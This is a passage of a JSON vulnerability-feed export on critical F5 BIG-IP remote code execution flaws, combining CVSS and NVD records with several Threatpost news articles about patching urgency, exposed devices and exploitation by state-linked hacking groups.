"cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-07-06T00:00:00", "type": "checkpoint_advisories", "title": "F5 BIG-IP Remote Code Execution (CVE-2020-5902)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-5902"], "modified": "2020-07-21T00:00:00", "id": "CPAI-2020-0628", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "cve": [{"lastseen": "2022-03-23T14:26:25", "description": "On BIG-IP versions 16.0.x before 16.0.1.1, 15.1.x before 15.1.2.1, 14.1.x before 14.1.4, 13.1.x before 13.1.3.6, 12.1.x before 12.1.5.3, and 11.6.x before 11.6.5.3 when running in Appliance mode, the Traffic Management User Interface (TMUI), also referred to as the Configuration utility, has an authenticated remote command execution vulnerability in undisclosed pages. Note: Software versions which have reached End of Software Development (EoSD) are not evaluated.", "cvss3": {"exploitabilityScore": 3.1, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 9.9, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-03-31T17:15:00", "type": "cve", "title": "CVE-2021-22987", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22987"], "modified": "2021-04-05T19:26:00", "cpe": [], "id": "CVE-2021-22987", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-22987", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "cpe23": []}, {"lastseen": "2022-07-13T15:59:24", "description": "On BIG-IP versions 16.0.x before 16.0.1.1, 15.1.x before 15.1.2.1, 14.1.x before 14.1.4, 13.1.x before 13.1.3.6, and 12.1.x before 12.1.5.3 amd BIG-IQ 7.1.0.x before 7.1.0.3 and 7.0.0.x before 7.0.0.2, the iControl REST interface has an unauthenticated remote command execution vulnerability. Note: Software versions which have reached End of Software Development (EoSD) are not evaluated.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-03-31T15:15:00", "type": "cve", "title": "CVE-2021-22986", "cwe": ["CWE-918"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22986"], "modified": "2022-07-12T17:42:00", "cpe": [], "id": "CVE-2021-22986", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-22986", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": []}, {"lastseen": "2022-07-13T16:58:49", "description": "In BIG-IP versions 15.0.0-15.1.0.3, 14.1.0-14.1.2.5, 13.1.0-13.1.3.3, 12.1.0-12.1.5.1, and 11.6.1-11.6.5.1, the Traffic Management User Interface (TMUI), also referred to as the Configuration utility, has a Remote Code Execution (RCE) vulnerability in undisclosed pages.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-07-01T15:15:00", "type": "cve", "title": "CVE-2020-5902", "cwe": ["CWE-22"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-5902"], "modified": "2022-07-12T17:42:00", "cpe": ["cpe:/a:f5:big-ip_access_policy_manager:15.0.1.4"], "id": "CVE-2020-5902", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-5902", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:f5:big-ip_access_policy_manager:15.0.1.4:*:*:*:*:*:*:*"]}], "threatpost": [{"lastseen": "2021-03-11T14:39:21", "description": "F5 Networks is warning users to patch four critical remote command execution (RCE) flaws in its BIG-IP and BIG-IQ enterprise networking infrastructure. If exploited, the flaws could allow attackers to take full control over a vulnerable system.\n\nThe company released an advisory, Wednesday, on seven bugs in total, with two others rated as high risk and one rated as medium risk, respectively. \u201cWe strongly encourage all customers to update their BIG-IP and BIG-IQ systems to a fixed version as soon as possible,\u201d the company [advised](<https://www.f5.com/services/support/March2021_Vulnerabilities>) on its website.\n\nThe scenario is particularly urgent as F5 provides enterprise networking to some of the largest tech companies in the world, including Facebook, Microsoft and Oracle, as well as to a trove of Fortune 500 companies, including some of the world\u2019s biggest financial institutions and ISPs.\n\n[![](https://media.threatpost.com/wp-content/uploads/sites/103/2019/02/19151457/subscribe2.jpg)](<https://threatpost.com/newsletter-sign/>)\n\nThe U.S. Cybersecurity and Infrastructure Agency (CISA) also [urged](<https://us-cert.cisa.gov/ncas/current-activity/2021/03/10/f5-security-advisory-rce-vulnerabilities-big-ip-big-iq>) companies using BIG-IP and BIG-IQ to fix two of the critical vulnerabilities, which are being tracked as [CVE-2021-22986](<https://support.f5.com/csp/article/K03009991>) and [CVE-2021-22987](<https://support.f5.com/csp/article/K18132488>).\n\nThe former, with a CVSS rating of 9.8, is an unauthenticated remote command execution vulnerability in the iControl REST interface, according to a [detailed breakdown](<https://support.f5.com/csp/article/K02566623>) of the bugs in F5\u2019s Knowledge Center. The latter, with a CVSS rating of 9.9, affects the infrastructure\u2019s Traffic Management User Interface (TMUI), also referred to as the Configuration utility. When running in Appliance mode, the TMUI has an authenticated RCE vulnerability in undisclosed pages, according to F5.\n\nThe two other critically rated vulnerabilities are being tracked as [CVE-2021-22991](<https://support.f5.com/csp/article/K56715231>) and [CVE-2021-22992](<https://support.f5.com/csp/article/K52510511>). The first, with a CVSS score of 9.0, is a buffer overflow vulnerability that can be triggered when \u201cundisclosed requests to a virtual server may be incorrectly handled by the Traffic Management Microkernel (TMM) URI normalization,\u201d according to F5. This can result in a denial-of-service (DoS) attack, that, in some situations, \u201cmay theoretically allow bypass of URL based access control or remote code execution (RCE),\u201d the company warned.\n\nCVE-2021-22992 is also a buffer overflow bug with a CVSS rating of 9. This flaw can be triggered by \u201ca malicious HTTP response to an Advanced WAF/BIG-IP ASM virtual server with Login Page configured in its policy,\u201d according to F5. It also may allow for RCE and \u201ccomplete system compromise\u201d in some situations, the company warned.\n\nThe other three non-critical bugs being patched in F5\u2019s update this week are [CVE-2021-22988](<https://support.f5.com/csp/article/K70031188>), [CVE-2021-22989](<https://support.f5.com/csp/article/K56142644>) and [CVE-2021-22990](<https://support.f5.com/csp/article/K45056101>).\n\nCVE-2021-22988, with a CVSS score of 8.8, is an authenticated RCE that also affects TMUI. CVE-2021-22989, with a CVSS rating of 8.0, is another authenticated RCE that also affects TMUI in Appliance mode, this time when Advanced WAF or BIG-IP ASM are provisioned. And CVE-2021-2290, with a CVSS score of 6.6, is a similar but less dangerous vulnerability that exists in the same scenario, according to F5.\n\nF5 is no stranger to critical bugs in its enterprise networking products. In July, the vendor and other security experts\u2014including U.S. Cyber Command\u2014urged companies to deploy an urgent patch for a critical RCE vulnerability in BIG-IP\u2019s app delivery controllers that was being actively exploited by attackers to scrape credentials, launch malware and more. That bug, ([CVE-2020-5902](<https://support.f5.com/csp/article/K52145254>)), had a CVSS rating of 10 out of 10. Moreover, a delay in patching at the time left systems [exposed to the flaw](<https://threatpost.com/thousands-f5-big-ip-users-takeover/157543/>) for weeks after F5 released the fix.\n\n_**Check out our free **_[**_upcoming live webinar events_**](<https://threatpost.com/category/webinars/>)_** \u2013 unique, dynamic discussions with cybersecurity experts and the Threatpost community:**_\n\n * March 24: **Economics of 0-Day Disclosures: The Good, Bad and Ugly **([Learn more and register!](<https://threatpost.com/webinars/economics-of-0-day-disclosures-the-good-bad-and-ugly/>))\n * April 21: **Underground Markets: A Tour of the Dark Economy **([Learn more and register!](<https://threatpost.com/webinars/underground-markets-a-tour-of-the-dark-economy/>))\n", "cvss3": {}, "published": "2021-03-11T14:21:50", "type": "threatpost", "title": "F5, CISA Warn of Critical BIG-IP and BIG-IQ RCE Bugs", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-5902", "CVE-2021-2290", "CVE-2021-22986", "CVE-2021-22987", "CVE-2021-22988", "CVE-2021-22989", "CVE-2021-22990", "CVE-2021-22991", "CVE-2021-22992"], "modified": "2021-03-11T14:21:50", "id": "THREATPOST:1D03F5885684829E899CEE4F63F5AC27", "href": "https://threatpost.com/f5-cisa-critical-rce-bugs/164679/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-10-14T22:22:26", "description": "About 8,000 users of F5 Networks\u2019 BIG-IP family of networking devices are still vulnerable to full system access and remote code-execution (RCE), despite a patch for a critical flaw being available for two weeks.\n\nThe BIG-IP family consists of application delivery controllers, Local Traffic Managers (LTMs) and domain name system (DNS) managers, together offering built-in security, traffic management and performance application services for private data centers or in the cloud.\n\nAt the end of June, F5 issued urgent patches for a critical RCE flaw ([CVE-2020-5902](<https://support.f5.com/csp/article/K52145254>)), which is present in the Traffic Management User Interface (TMUI) of the company\u2019s BIG-IP app delivery controllers. The bug has a CVSS severity score of 10 out of 10, and at the time of disclosure, Shodan [showed](<https://twitter.com/GossiTheDog/status/1279005317821497344/photo/1>) that there were almost 8,500 vulnerable devices exposed on the internet.\n\n[![](https://media.threatpost.com/wp-content/uploads/sites/103/2019/02/19151457/subscribe2.jpg)](<https://threatpost.com/newsletter-sign/>)\n\nShortly after disclosure, public exploits [were made](<https://twitter.com/wugeej/status/1280008779359125504?s=20>) available for it, leading to mass scanning for [vulnerable devices ](<https://twitter.com/bad_packets/status/1279884302990237696?s=20>)by attackers, and ultimately active exploits.\n\n\u201cCVE-2020-5902 received the highest vulnerability rating of critical from the National Vulnerability Database due to its lack of complexity, ease of attack vector, and high impacts to confidentiality, integrity and availability,\u201d Expanse researchers noted in [an advisory](<http://expanse.co/blog/expanse-researchers-show-more-than-8,000-f5-big-ip-tmuis-are-still-exposed-on-the-internet>) issued on Friday. \u201cIt was deemed so critical that U.S. Cyber Command [issued a tweet](<https://threatpost.com/patch-critical-f5-flaw-active-attack/157164/>) on the afternoon of July 3, recommending immediate patching despite the holiday weekend. While F5 did not release a proof of concept (PoC) for the exploit, numerous PoCs began appearing on July 5.\u201d\n\nFast-forward to two weeks later, and patches have rolled out to less than 500 of that original group of vulnerable machines, according to the analysis. Expanse researchers said that as of July 15, there were at least 8,041 vulnerable TMUI instances still exposed to the public internet.\n\nThe stakes are high, as one would expect from a critical-rated bug: \u201cThe vulnerability CVE-2020-5902 allows for the execution of arbitrary system commands on vulnerable BIG-IP devices with an exposed and accessible management port via the TMUI,\u201d explained the researchers. \u201cThis vulnerability could provide complete control of the host machine upon exploitation, enabling interception and redirection of web traffic, decryption of traffic destined for web servers, and serve as a hop point into other areas of the network.\u201d\n\nTo boot, an additional bug, [CVE-2020-5903](<https://support.f5.com/csp/article/K43638305>), affects the same vulnerable management interface via a cross-site scripting vulnerability (XSS) that Expanse said could also be leveraged to include RCE.\n\nDespite active exploits and security experts urging companies to deploy the urgent patch for the critical vulnerability, patching is clearly going slowly \u2013 something that Tim Junio, CEO and co-founder of Expanse, chalks up to a lack of visibility.\n\n\u201cPatching is likely proceeding slowly because organizations may not know that they have these TMUIs,\u201d Junio told Threatpost. \u201cIf they are unaware of their complete inventory of internet-connected systems and services, they will not have well-defined processes for patching them. Security teams are also often stretched thin and that can result in delays in patching, even for critical items like this.\u201d\n\nJunio also told Threatpost that if a malicious actor gained this type of remote access it could be catastrophic \u2013 and yet the bug carries an ease of exploitation that he likens to a Jedi mind trick.\n\n\u201cAn attacker just needs to send the firewall a set of commands, which are now publicly known, in order to take over the firewall,\u201d he explained. \u201cA physical world analogy: If a firewall is a bit like a guard and a gate at the entrance of a facility that is surrounded by walls, this exploit is like a Jedi mind trick whereby an attacker can walk right up to the guard, suggest to the guard they leave their post and give the attacker a guard uniform and all keys to the gate \u2013 and _the guard will say yes_.\u201d\n\nThe attacker can then carry out all sorts of different nefarious activities in the context of a privileged user.\n\nJunio explained, continuing his analogy, \u201cIn other words, the attacker can now walk into the facility unimpeded (unauthorized access); bring sensitive data and objects out of the facility unimpeded (exfiltration); and can close the gate to legitimate people trying to enter the facility (denial of service); among many other actions.\u201d\n\nThe TMUI is responsible for configuration, and Junio noted that there\u2019s generally no reason for it to be exposed to the internet \u2013 so, a simple interim mitigation (albeit not a full one) in lieu of patching would be to remove it from public view.\n\n\u201cThis is a very concerning number of exposed TMUIs on the internet,\u201d said Junio. \u201cA hack of a major enterprise via this type of attack vector could be very damaging to that organization.\u201d\n\nHe added that he believes that an attack on any number of enterprises could go so far as to be harmful to the global economy.\n\n\u201cActual day-to-day users of F5 equipment are generally going to be security operations, network operations or infrastructure professionals,\u201d said Junio. \u201cBigger picture, the customers/buyers of this technology are some of the world\u2019s largest enterprises and government agencies.\u201d These include 48 out of the Fortune 50, he added, though he\u2019s not aware which, if any, of these specific installations are vulnerable to attack.\n", "cvss3": {}, "published": "2020-07-17T20:59:33", "type": "threatpost", "title": "Thousands of Vulnerable F5 BIG-IP Users Still Open to Takeover", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-5135", "CVE-2020-5902", "CVE-2020-5903"], "modified": "2020-07-17T20:59:33", "id": "THREATPOST:F54AECDBDA250A6122DF9A079CE7AEF3", "href": "https://threatpost.com/thousands-f5-big-ip-users-takeover/157543/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-09-01T21:47:35", "description": "An APT group known as Pioneer Kitten, linked to Iran, has been spotted selling corporate-network credentials on hacker forums. The credentials would let other cybercriminal groups and APTs perform cyberespionage and other nefarious cyber-activity.\n\nPioneer Kitten is a hacker group that specializes in infiltrating corporate networks using open-source tools to compromise remote external services. Researchers observed an actor associated with the group advertising access to compromised networks on an underground forum in July, according to a [blog post](<https://www.crowdstrike.com/blog/who-is-pioneer-kitten/>) Monday from Alex Orleans, a senior intelligence analyst at CrowdStrike Intelligence.\n\nPioneer Kitten\u2019s work is related to other groups either sponsored or run by the Iranian government, which [were previously seen](<https://www.zdnet.com/article/iranian-hackers-have-been-hacking-vpn-servers-to-plant-backdoors-in-companies-around-the-world/>) hacking VPNs and planting backdoors in companies around the world.\n\n[![](https://media.threatpost.com/wp-content/uploads/sites/103/2019/02/19151457/subscribe2.jpg)](<https://threatpost.com/newsletter-sign/>)\n\nIndeed, the credential sales on hacker forums seem to suggest \u201ca potential attempt at revenue stream diversification\u201d to complement \u201cits targeted intrusions in support of the Iranian government,\u201d Orleans wrote. However, Pioneer Kitten, which has been around since 2017, does not appear to be directly operated by the Iranian government but is rather sympathetic to the regime and likely a private contractor, Orleans noted.\n\nPioneer Kitten\u2019s chief mode of operations is its reliance on SSH tunneling, using open-source tools such as Ngrok and a custom tool called SSHMinion, he wrote. The group uses these tools to communicate \u201cwith implants and hands-on-keyboard activity via Remote Desktop Protocol (RDP)\u201d to exploit vulnerabilities in VPNs and network appliances to do its dirty work, Orleans explained.\n\nCrowdStrike observed the group leveraging several critical exploits in particular \u2014 [CVE-2019-11510](<https://nvd.nist.gov/vuln/detail/CVE-2019-11510>), [CVE-2019-19781](<https://nvd.nist.gov/vuln/detail/CVE-2019-19781>), and most recently, [CVE-2020-5902](<https://nvd.nist.gov/vuln/detail/CVE-2020-5902>). All three are exploits affect VPNs and networking equipment, including Pulse Secure \u201cConnect\u201d enterprise VPNs, Citrix servers and network gateways, and F5 Networks BIG-IP load balancers, respectively.\n\nPioneer Kitten\u2019s targets are North American and Israeli organizations in various sectors that represent some type of intelligence interest to the Iranian government, according to CrowdStrike. Target sectors run the gamut and include technology, government, defense, healthcare, aviation, media, academic, engineering, consulting and professional services, chemical, manufacturing, financial services, insurance and retail.\n\nWhile not as well-known or widespread in its activity as other nation-state threats such as China and Russia, Iran has emerged in recent years as a formidable cyber-enemy, amassing a number of APTs to mount attacks on its political adversaries.\n\nOf these, Charming Kitten\u2014which also goes by the names APT35, Ajax or Phosphorus\u2014appears to be the most active and dangerous, while others bearing similar names seem to be spin-offs or support groups. Iran overall appears to be ramping up its cyber-activity lately. CrowdStrike\u2019s report actually comes on the heels of news that Charming Kitten also has [resurfaced recently. ](<https://threatpost.com/charming-kitten-whatsapp-linkedin-effort/158813/>)A new campaign is using LinkedIn and WhatsApp to convince targets \u2014 including Israeli university scholars and U.S. government employees \u2014 to click on a malicious link that can steal credentials.\n\nOperating since 2014, Charming Kitten is known for politically motivated and socially engineered attacks, and often uses phishing as its attack of choice. Targets of the APT, which uses clever social engineering to snare victims, have been [email accounts](<https://threatpost.com/iran-linked-hackers-target-trump-2020-campaign-microsoft-says/148931/>) tied to the Trump 2020 re-election campaign and [public figures and human-rights activists](<https://threatpost.com/charming-kitten-uses-fake-interview-requests-to-target-public-figures/152628/>), among others.\n\n**[On Wed Sept. 16 @ 2 PM ET:](<https://threatpost.com/webinars/five-essentials-for-running-a-successful-bug-bounty-program/>) Learn the secrets to running a successful Bug Bounty Program. [Register today](<https://slack-redir.net/link?url=https%3A%2F%2Fthreatpost.com%2Fwebinars%2Ffive-essentials-for-running-a-successful-bug-bounty-program%2F>) for this FREE Threatpost webinar \u201c[Five Essentials for Running a Successful Bug Bounty Program](<https://slack-redir.net/link?url=https%3A%2F%2Fthreatpost.com%2Fwebinars%2Ffive-essentials-for-running-a-successful-bug-bounty-program%2F>)\u201c. Hear from top Bug Bounty Program experts how to juggle public versus private programs and how to navigate the tricky terrain of managing Bug Hunters, disclosure policies and budgets. Join us Wednesday Sept. 16, 2-3 PM ET for this [LIVE](<https://slack-redir.net/link?url=https%3A%2F%2Fthreatpost.com%2Fwebinars%2Ffive-essentials-for-running-a-successful-bug-bounty-program%2F>) webinar.**\n", "cvss3": {}, "published": "2020-09-01T13:35:19", "type": "threatpost", "title": "Pioneer Kitten APT Sells Corporate Network Access", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2019-11510", "CVE-2019-19781", "CVE-2020-5902"], "modified": "2020-09-01T13:35:19", "id": "THREATPOST:AD4EF56E5440159F6E37D8B403C253D7", "href": "https://threatpost.com/pioneer-kitten-apt-sells-corporate-network-access/158833/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-10-15T22:17:15", "description": "Security experts are urging companies to deploy an urgent patch for a critical vulnerability in F5 Networks\u2019 networking devices, which is being actively exploited by attackers to scrape credentials, launch malware and more.\n\nLast week, F5 Networks issued urgent patches for the critical remote code-execution flaw ([CVE-2020-5902](<https://support.f5.com/csp/article/K52145254>)), which has a CVSS score of 10 out of 10. The flaw exists in the configuration interface of the company\u2019s BIG-IP app delivery controllers, which are used for various networking functions, including app-security management and load-balancing. Despite a patch being available, Shodan [shows](<https://twitter.com/GossiTheDog/status/1279005317821497344/photo/1>) almost 8,500 vulnerable devices are still available on the internet.\n\nNot long after the flaw was disclosed, public exploits [were made](<https://twitter.com/wugeej/status/1280008779359125504?s=20>) available for it, leading to mass scanning for [vulnerable devices ](<https://twitter.com/bad_packets/status/1279884302990237696?s=20>)by attackers and ultimately active exploits. Researchers warn that they\u2019ve seen attackers targeting the flaw over the weekend for various malicious activities, including launching [Mirai variant DvrHelper](<https://threatpost.com/new-mirai-variant-mukashi-targets-zyxel-nas-devices/153982/>), deploying cryptocurrency mining malware and [scraping credentials](<https://twitter.com/GossiTheDog/status/1279856862888898568>) \u201cin an automated fashion.\u201d\n\n[![](https://media.threatpost.com/wp-content/uploads/sites/103/2019/02/19151457/subscribe2.jpg)](<https://threatpost.com/newsletter-sign/>)\n\nRich Warren, principal security consultant for NCC Group, [said Monday on Twitter](<https://twitter.com/buffaloverflow/status/1279384540847489024>) that \u201cas of this morning we are seeing an uptick in RCE attempts against our honeypots, using a combination of either the public Metasploit module, or similar via Python.\u201d\n\n> Ok, we are seeing active exploitation of CVE-2020-5902\n> \n> Patch it today\n> \n> \u2014 Rich Warren (@buffaloverflow) [July 4, 2020](<https://twitter.com/buffaloverflow/status/1279384540847489024?ref_src=twsrc%5Etfw>)\n\nThe exploit of the flaw is trivial: Mikhail Klyuchnikov with Positive Technologies, [who originally discovered the flaw](<https://www.ptsecurity.com/ww-en/about/news/f5-fixes-critical-vulnerability-discovered-by-positive-technologies-in-big-ip-application-delivery-controller/>), said that in order to exploit the vulnerability, an unauthenticated attacker would only need to send a specifically crafted HTTP request to the server hosting the Traffic Management User Interface (TMUI) utility for BIG-IP configuration.\n\n\u201cBy exploiting this vulnerability, a remote attacker with access to the BIG-IP configuration utility could, without authorization, perform remote code execution (RCE1),\u201d Klyuchnikov said. \u201cThe attacker can create or delete files, disable services, intercept information, run arbitrary system commands and Java code, completely compromise the system, and pursue further targets, such as the internal network.\u201d\n\n[Vulnerable versions of BIG-IP (](<https://support.f5.com/csp/article/K52145254>)11.6.x, 12.1.x, 13.1.x, 14.1.x, 15.0.x, 15.1.x) should be updated to the corresponding fixed versions (11.6.5.2, 12.1.5.2, 13.1.3.4, 14.1.2.6, 15.1.0.4), he said.\n\nAs more active exploits are detected in the wild, [F5 Networks](<https://twitter.com/F5Networks/status/1279022116868960257>), the [U.S. Cyber Command](<https://twitter.com/CNMF_CyberAlert/status/1279151966178902016>) and [Chris Krebs](<https://twitter.com/CISAKrebs/status/1279939623062581251>), director at the U.S. Cybersecurity and Infrastructure Security Agency (CISA), have all urged administrators to implement the offered fixes as soon as possible.\n\nAnother flaw was also fixed last week in BIG-IP that could allow an authenticated attacker to launch cross-site scripting attacks. The flaw ([CVE-2020-5903](<https://support.f5.com/csp/article/K43638305>)) allows attackers to run malicious JavaScript code as a logged-in user.\n\nF5 Networks previously [dealt with security issues](<https://threatpost.com/authentication-bypass-bug-enterprise-vpns/143781/>) in 2019 when its VPN app (as well as ones built by Cisco, Palo Alto Networks and Pulse Secure) was discovered to improperly store authentication tokens and session cookies without encryption on a user\u2019s computer.\n\n**_BEC and enterprise email fraud is surging, but DMARC can help \u2013 if it\u2019s done right. On July 15 at 2 p.m. ET, join Valimail Global Technical Director Steve Whittle and Threatpost for a [FREE webinar](<https://attendee.gotowebinar.com/register/441045308082589963?source=art>), \u201cDMARC: 7 Common Business Email Mistakes.\u201d This technical \u201cbest practices\u201d session will cover constructing, configuring, and managing email authentication protocols to ensure your organization is protected. [Click here to register](<https://attendee.gotowebinar.com/register/441045308082589963?source=art>) for this Threatpost webinar, sponsored by Valimail._**\n", "cvss3": {}, "published": "2020-07-06T19:06:20", "type": "threatpost", "title": "Admins Urged to Patch Critical F5 Flaw Under Active Attack", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-24400", "CVE-2020-24407", "CVE-2020-5902", "CVE-2020-5903"], "modified": "2020-07-06T19:06:20", "id": "THREATPOST:312E32AA4DC31CFD90D946BC7E36088B", "href": "https://threatpost.com/patch-critical-f5-flaw-active-attack/157164/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-10-14T22:19:31", "description": "The U.S. government is warning that Chinese threat actors have successfully compromised several government and private sector entities in recent months, by exploiting vulnerabilities in F5 BIG-IP devices, Citrix and Pulse Secure VPNs and Microsoft Exchange servers.\n\nPatches are currently available for all these flaws \u2013 and in some cases, have been available for over a year \u2013 however, the targeted organizations had not yet updated their systems, leaving them vulnerable to compromise, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) said in a Monday advisory. CISA claims the attacks were launched by threat actors affiliated with the Chinese Ministry of State Security.\n\n[![Threatpost Webinar Promo Bug Bounty](https://media.threatpost.com/wp-content/uploads/sites/103/2020/09/04091928/bounty_webinar_promo_small.gif)](<https://threatpost.com/webinars/five-essentials-for-running-a-successful-bug-bounty-program/>)\n\nClick to Register\n\n\u201cCISA and the FBI also recommend that organizations routinely audit their configuration and patch management programs to ensure they can track and mitigate emerging threats,\u201d according to a [Monday CISA advisory](<https://us-cert.cisa.gov/sites/default/files/publications/AA20-258A-Chinese_Ministry_of_State_Security-Affiliated_Cyber_Threat_Actor_Activity_S508C.pdf>). \u201cImplementing a rigorous configuration and patch management program will hamper sophisticated cyber threat actors\u2019 operations and protect organizations\u2019 resources and information systems.\u201d\n\nNo further details on the specific hacked entities were made public. The threat actors have been spotted successfully exploiting two common vulnerabilities \u2013 allowing them to compromise federal government and commercial entities, according to CISA.\n\nThe first is a vulnerability (CVE-2020-5902) in [F5\u2019s Big-IP Traffic Management User Interface](<https://threatpost.com/thousands-f5-big-ip-users-takeover/157543/>), which allows cyber threat actors to execute arbitrary system commands, create or delete files, disable services, and/or execute Java code. As of July, about 8,000 users of F5 Networks\u2019 BIG-IP family of networking devices [were still vulnerable](<https://threatpost.com/patch-critical-f5-flaw-active-attack/157164/>) to the critical flaw.\n\nFeds also observed the attackers exploiting an [arbitrary file reading vulnerability](<https://threatpost.com/dhs-urges-pulse-secure-vpn-users-to-update-passwords/154925/>) affecting Pulse Secure VPN appliances (CVE-2019-11510). This flaw \u2013 speculated to be the [cause of the Travelex breach](<https://threatpost.com/sodinokibi-ransomware-travelex-fiasco/151600/>) earlier this year \u2013 allows bad actors to gain access to victim networks.\n\n\u201cAlthough Pulse Secure released patches for CVE-2019-11510 in April 2019, CISA observed incidents where [compromised Active Directory credentials](<https://threatpost.com/apt-groups-exploiting-flaws-in-unpatched-vpns-officials-warn/148956/>) were used months after the victim organization patched their VPN appliance,\u201d according to the advisory.\n\nThreat actors were also observed hunting for [Citrix VPN Appliances](<https://threatpost.com/unpatched-citrix-flaw-exploits/151748/>) vulnerable to CVE-2019-19781, which is a flaw that enables attackers to execute directory traversal attacks. And, they have also been observed attempting to exploit a [Microsoft Exchange server](<https://threatpost.com/serious-exchange-flaw-still-plagues-350k-servers/154548/>) remote code execution flaw (CVE-2020-0688) that allows attackers to collect emails of targeted networks.\n\nAs part of its advisory, CISA also identified common TTPs utilized by the threat actors. For instance, threat actors have been spotted using [the Cobalt Strike commercial penetration testing tool](<https://threatpost.com/apt29-re-emerges-after-2-years-with-widespread-espionage-campaign/139246/>) to target commercial and federal government networks; they have also seen the actors successfully deploying the [open-source China Chopper tool](<https://threatpost.com/china-chopper-tool-multiple-campaigns/147813/>) against organization networks and using [open-source tool Mimikatz](<https://threatpost.com/wipro-attackers-under-radar/144276/>).\n\nThe initial access vector for these cyberattacks vary. CISA said it has observed threat actors utilize malicious links in spearphishing emails, as well as exploit public facing applications. In one case, CISA observed the threat actors scanning a federal government agency for vulnerable web servers, as well 